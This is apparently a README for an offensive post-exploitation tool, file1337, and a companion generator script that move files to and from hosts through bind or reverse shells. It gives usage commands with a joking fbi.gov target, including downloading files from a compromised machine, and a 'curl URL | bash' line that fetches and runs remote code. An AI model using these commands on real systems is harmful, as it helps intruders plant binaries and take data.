file1337
might help if you have a bind or reverse shell working and want to transfer files without any additional servers involved. This experimental tool does nothing special and doesn't do that well.
generator.py
may help if you can execute shell commands on the target programatically, but have no access to stdin
. It's most likely possible to upload arbitrary file through a series of shell commands which it generates.
For bind shell:
file1337 d|u [-d driver] [-o offset] HOST PORT source_file [target_file = basename]
For reverse shell:
file1337 d|u [-d driver] [-o offset] -l listen_port source_file [target_file = basename]
Target needs to be compatible with at least one driver (default is shell
):
shell
- requires... a shell... andecho
,stat
,chmod
,cat
anddd
(dd
only for download).shell_nodd
- same as above but doesn't usedd
, and doesn't support offsetsperl
- tested on latest version which is often not the case, but doesn't use any fancy features.
file1337
tries to preserve basic file permission bits, so no need to chmod +x
after uploading binaries.
Of course it does, since it's written by zb3. But file1337
also:
- Doesn't support files larger than 4GB.
- Supports only files, not directories.
- Gives no feedback. Files may be uploaded partially, not at all, or contain garbage at the end.
file1337
is too primitive to handle these cases. How should it handle network connection loss when expecting a reverse shell? It's out of scope. Only a warning will appear.
So you have a bindshell running on fbi.gov
on port 3243
and you want to upload me.txt
as /fbi/mostwanted/zb3.txt
on the target. The command is:
file1337 u fbi.gov 3243 me.txt /fbi/mostwanted/zb3.txt
To listen for a reverse shell on port 22633
, use:
file1337 u -l 22633 me.txt /fbi/mostwanted/zb3.txt
Downloading files works similar way:
file1337 d fbi.gov 3243 /fbi/investigation_info/zb3.txt
If it turns out only X
bytes were transfered, repeat the previous command with -o X
to resume the transfer (you must supply that value manually). shell_nodd
driver doesn't support doing that.
It can compile itself, see this gist
curl URL | bash
will compile into file1337
file and execute (show help).
If you can only execute shell commands, and have no access to their stdin
(which is quite common) there may be multiple ways to upload binary files via shell commands which this script generates.
Again, there are "drivers":
shell
- justcat BASE64 | base64 -di >> target
shell_en
- justecho -en ESCAPED >> target
perl
- uses base64 too
Since command length is usually limited (around 130KB), it can generate more than one command. By default the limit is 130KB, but it may be much less on the target.
See gentest.py
for (short circuit) usage example.